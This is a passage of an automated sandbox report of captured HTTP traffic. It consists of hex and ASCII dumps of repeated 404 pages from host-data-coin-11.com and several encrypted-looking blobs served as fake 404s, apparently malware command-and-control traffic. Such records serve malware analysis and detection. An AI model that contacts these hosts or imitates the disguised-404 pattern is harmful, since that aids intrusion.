34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 08:25:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 